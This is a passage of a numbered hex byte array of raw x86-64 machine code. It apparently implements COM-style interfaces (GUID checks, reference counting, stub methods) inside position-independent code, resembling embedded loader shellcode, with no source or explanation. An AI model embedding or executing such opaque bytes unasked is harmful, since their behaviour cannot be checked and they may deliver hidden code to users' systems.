791 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b,
792 0x80, 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x01, 0x48, 0x8d, 0x14,
793 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x49, 0x89, 0xd0, 0xba,
794 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x54, 0x14, 0x00, 0x00,
795 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x50, 0x48,
796 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00,
797 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x90, 0x48, 0x81, 0xc4, 0x30,
798 0x02, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec,
799 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45,
800 0x18, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00,
801 0x48, 0x8d, 0x15, 0xd5, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x8b,
802 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x69, 0x01, 0x00, 0x00,
803 0x48, 0x89, 0x50, 0x08, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
804 0x8d, 0x15, 0x91, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x10, 0x48, 0x8b,
805 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xf3, 0x02, 0x00, 0x00,
806 0x48, 0x89, 0x50, 0x18, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
807 0x8d, 0x15, 0xae, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x20, 0x48, 0x8b,
808 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x08, 0x03, 0x00, 0x00,
809 0x48, 0x89, 0x50, 0x28, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
810 0x8d, 0x15, 0x09, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x30, 0x48, 0x8b,
811 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x0e, 0x03, 0x00, 0x00,
812 0x48, 0x89, 0x50, 0x38, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
813 0x8d, 0x15, 0x14, 0x02, 0x00, 0x00, 0x48, 0x89, 0x50, 0x40, 0x48, 0x8b,
814 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xfc, 0x02, 0x00, 0x00,
815 0x48, 0x89, 0x50, 0x48, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
816 0x8d, 0x15, 0xf9, 0x02, 0x00, 0x00, 0x48, 0x89, 0x50, 0x50, 0x48, 0x8b,
817 0x45, 0xf8, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45,
818 0xf8, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x50, 0x50, 0x90, 0x48, 0x83,
819 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30,
820 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20,
821 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x83, 0x7d, 0x20,
822 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x75, 0x48, 0x8b,
823 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8d, 0x88, 0xfc, 0x03, 0x00,
824 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48,
825 0x89, 0xc2, 0xe8, 0x85, 0x13, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x25, 0x48,
826 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8d, 0x88, 0xac, 0x04,
827 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00,
828 0x48, 0x89, 0xc2, 0xe8, 0x60, 0x13, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x1b,
829 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x10, 0x48,
830 0x8b, 0x4d, 0x10, 0xe8, 0x1d, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00,
831 0x00, 0xeb, 0x10, 0x48, 0x8b, 0x45, 0x20, 0x48, 0xc7, 0x00, 0x00, 0x00,
832 0x00, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0x48, 0x83, 0xc4, 0x30, 0x5d,
833 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d,
834 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45,
835 0xf8, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45,
836 0xf0, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x0f, 0xc1, 0x10, 0x48, 0x8b,
837 0x45, 0xf8, 0x8b, 0x40, 0x08, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55,
838 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48,
839 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48,
840 0x83, 0xc0, 0x08, 0x48, 0x89, 0x45, 0xe8, 0x48, 0x8b, 0x55, 0xe8, 0xb8,
841 0x01, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x89, 0xc1, 0x89, 0xc8, 0xf0, 0x0f,
842 0xc1, 0x02, 0x01, 0xc8, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0x48, 0x83,
843 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30,
844 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20,
845 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8,
846 0x8b, 0x45, 0x20, 0x83, 0xe0, 0x02, 0x85, 0xc0, 0x74, 0x39, 0x48, 0x83,
847 0x7d, 0x30, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x70,
848 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x00, 0x48,
849 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8b, 0x52, 0x28, 0x48,
850 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x50, 0x28,
851 0x48, 0x8b, 0x45, 0x30, 0x48, 0x89, 0x10, 0x8b, 0x45, 0x20, 0x83, 0xe0,
852 0x01, 0x85, 0xc0, 0x74, 0x36, 0x48, 0x83, 0x7d, 0x28, 0x00, 0x75, 0x07,
853 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x2d, 0x48, 0x8b, 0x45, 0xf8, 0x48,
854 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x55, 0xf8, 0x48,
855 0x83, 0xc2, 0x18, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0xf8,
856 0x48, 0x8d, 0x50, 0x18, 0x48, 0x8b, 0x45, 0x28, 0x48, 0x89, 0x10, 0xb8,
857 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x30, 0x5d, 0xc3, 0x55, 0x48,
858 0x89, 0xe5, 0x48, 0x83, 0xc4, 0x80, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89,
859 0x55, 0x18, 0xc7, 0x45, 0xac, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa8,
860 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa4, 0x00, 0x00, 0x00, 0x00, 0x48,
861 0x8d, 0x45, 0xb0, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00,
862 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x26, 0x11, 0x00, 0x00, 0x48, 0x8b,
863 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8d, 0x55,
864 0xb0, 0x48, 0x8b, 0x4d, 0x18, 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x83, 0x7d,
865 0xfc, 0x00, 0x75, 0x20, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48,
866 0x8b, 0x40, 0x20, 0x4c, 0x8d, 0x4d, 0xa4, 0x4c, 0x8d, 0x45, 0xa8, 0x48,
867 0x8d, 0x55, 0xac, 0x48, 0x8b, 0x4d, 0x18, 0xff, 0xd0, 0x89, 0x45, 0xfc,
868 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xec, 0x80, 0x5d, 0xc3, 0x55,
869 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, 0x48, 0x89, 0x4d, 0x10, 0x48,
870 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48,
871 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x40, 0x78, 0xff,
872 0xd0, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x18, 0x89, 0x10, 0xb8, 0x00, 0x00,
873 0x00, 0x00, 0x48, 0x83, 0xc4, 0x30, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
874 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x00, 0x00, 0x00,
875 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48,
876 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0xb8, 0x00, 0x00, 0x00, 0x00,
877 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55,
878 0x18, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
879 0x48, 0x89, 0x4d, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55,
880 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00,
881 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, 0x48, 0x89,
882 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
883 0x00, 0x48, 0x8d, 0x15, 0xb2, 0x02, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48,
884 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x5d, 0x03, 0x00,
885 0x00, 0x48, 0x89, 0x50, 0x08, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
886 0x48, 0x8d, 0x15, 0x7d, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x10, 0x48,
887 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xa4, 0x03, 0x00,
888 0x00, 0x48, 0x89, 0x50, 0x18, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
889 0x48, 0x8d, 0x15, 0xbd, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x20, 0x48,
890 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x06, 0x04, 0x00,
891 0x00, 0x48, 0x89, 0x50, 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
892 0x48, 0x8d, 0x15, 0x37, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x30, 0x48,
893 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x99, 0x04, 0x00,
894 0x00, 0x48, 0x89, 0x50, 0x38, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
895 0x48, 0x8d, 0x15, 0x9a, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x40, 0x48,
896 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x9b, 0x04, 0x00,
897 0x00, 0x48, 0x89, 0x50, 0x48, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
898 0x48, 0x8d, 0x15, 0x9c, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x50, 0x48,
899 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x9d, 0x04, 0x00,
900 0x00, 0x48, 0x89, 0x50, 0x58, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
901 0x48, 0x8d, 0x15, 0x9e, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x60, 0x48,
902 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xa1, 0x04, 0x00,
903 0x00, 0x48, 0x89, 0x50, 0x68, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
904 0x48, 0x8d, 0x15, 0xd3, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x70, 0x48,
905 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xd4, 0x04, 0x00,
906 0x00, 0x48, 0x89, 0x50, 0x78, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
907 0x48, 0x8d, 0x15, 0xd5, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0x80, 0x00,
908 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
909 0xd3, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0x88, 0x00, 0x00, 0x00, 0x48,
910 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xd1, 0x04, 0x00,
911 0x00, 0x48, 0x89, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
912 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xcf, 0x04, 0x00, 0x00, 0x48, 0x89,
913 0x90, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
914 0x48, 0x8d, 0x15, 0xcd, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xa0, 0x00,
915 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
916 0xca, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xa8, 0x00, 0x00, 0x00, 0x48,
917 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xd0, 0x04, 0x00,
918 0x00, 0x48, 0x89, 0x90, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
919 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xce, 0x04, 0x00, 0x00, 0x48, 0x89,
920 0x90, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
921 0x48, 0x8d, 0x15, 0xd4, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xc0, 0x00,
922 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
923 0xd2, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xc8, 0x00, 0x00, 0x00, 0x48,
924 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xea, 0x04, 0x00,
925 0x00, 0x48, 0x89, 0x90, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
926 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xec, 0x04, 0x00, 0x00, 0x48, 0x89,
927 0x90, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
928 0x48, 0x8d, 0x15, 0xea, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xe0, 0x00,
929 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
930 0xe8, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xe8, 0x00, 0x00, 0x00, 0x48,
931 0x8b, 0x45, 0x18, 0xc7, 0x40, 0x20, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
932 0x45, 0x18, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x50, 0x28, 0x48, 0x8b,
933 0x45, 0x10, 0x48, 0x8b, 0x80, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55,
934 0x18, 0x48, 0x83, 0xc2, 0x08, 0x48, 0x8b, 0x4d, 0x10, 0x48, 0x81, 0xc1,
935 0xdc, 0x03, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x83, 0x7d, 0xfc,
936 0x00, 0x75, 0x32, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48,
937 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x55, 0x18, 0x4c, 0x8d,
938 0x42, 0x10, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x8a, 0x8c, 0x04, 0x00,
939 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x08, 0x4c, 0x89, 0xca,
940 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x30,
941 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89,
942 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48, 0x83,
943 0x7d, 0x20, 0x00, 0x75, 0x0a, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xe9, 0x91,
944 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x28, 0x48,
945 0x8d, 0x88, 0xfc, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8,
946 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xd4, 0x0d, 0x00, 0x00,
947 0x85, 0xc0, 0x74, 0x4a, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x28,
948 0x48, 0x8d, 0x88, 0x0c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41,
949 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xaf, 0x0d, 0x00,
950 0x00, 0x85, 0xc0, 0x74, 0x25, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
951 0x28, 0x48, 0x8d, 0x88, 0x8c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
952 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0x8a, 0x0d,
953 0x00, 0x00, 0x85, 0xc0, 0x75, 0x12, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8b,
954 0x55, 0x10, 0x48, 0x89, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x10,
955 0x48, 0x8b, 0x45, 0x20, 0x48, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8,
956 0x02, 0x40, 0x00, 0x80, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48,
957 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b,
958 0x45, 0x10, 0x48, 0x83, 0xc0, 0x20, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b,
959 0x45, 0xf8, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x0f, 0xc1, 0x10, 0x48,
960 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x20, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3,
961 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10,
962 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc0, 0x20, 0x48, 0x89, 0x45, 0xf0,
963 0x48, 0x8b, 0x55, 0xf0, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x89,
964 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1, 0x02, 0x01, 0xc8, 0x89, 0x45, 0xfc,
965 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89,
966 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x83, 0x7d,
967 0x18, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x0f, 0x48,
968 0x8b, 0x45, 0x18, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00,
969 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20,
970 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0x4c,
971 0x89, 0x4d, 0x28, 0x48, 0x83, 0x7d, 0x28, 0x00, 0x75, 0x07, 0xb8, 0x03,
972 0x40, 0x00, 0x80, 0xeb, 0x30, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
973 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x55, 0x10,
974 0x48, 0x8b, 0x52, 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45,
975 0x10, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x45, 0x28, 0x48, 0x89, 0x10,
976 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55,
977 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48,
978 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x44, 0x89, 0x4d, 0x28, 0x48,
979 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b,
980 0x40, 0x50, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8b, 0x4a, 0x10, 0x4c, 0x8b,
981 0x4d, 0x38, 0x44, 0x8b, 0x45, 0x28, 0x48, 0x8b, 0x55, 0x20, 0xff, 0xd0,
982 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83,
983 0xec, 0x60, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45,
984 0x20, 0x44, 0x89, 0x4d, 0x28, 0x8b, 0x45, 0x30, 0x66, 0x89, 0x45, 0xec,
985 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48,
986 0x8b, 0x40, 0x58, 0x44, 0x0f, 0xb7, 0x4d, 0xec, 0x48, 0x8b, 0x55, 0x10,
987 0x48, 0x8b, 0x4a, 0x10, 0x44, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x55, 0x50,
988 0x48, 0x89, 0x54, 0x24, 0x38, 0x48, 0x8b, 0x55, 0x48, 0x48, 0x89, 0x54,
989 0x24, 0x30, 0x48, 0x8b, 0x55, 0x40, 0x48, 0x89, 0x54, 0x24, 0x28, 0x48,
990 0x8b, 0x55, 0x38, 0x48, 0x89, 0x54, 0x24, 0x20, 0x48, 0x8b, 0x55, 0x10,
991 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x60,
992 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89,
993 0x55, 0x18, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89,
994 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40,
995 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
996 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55,
997 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8,
998 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
999 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1000 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0xd0, 0x66,
1001 0x89, 0x45, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48,
1002 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55,
1003 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x00,
1004 0x48, 0x8b, 0x40, 0x70, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8b, 0x4a, 0x18,
1005 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00,
1006 0xba, 0xfd, 0xff, 0xff, 0xff, 0xff, 0xd0, 0xb8, 0x00, 0x00, 0x00, 0x00,
1007 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1008 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1009 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55,
1010 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1011 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00,
1012 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48,
1013 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48,
1014 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01,
1015 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d,
1016 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3,
1017 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0xb8,
1018 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1019 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89,
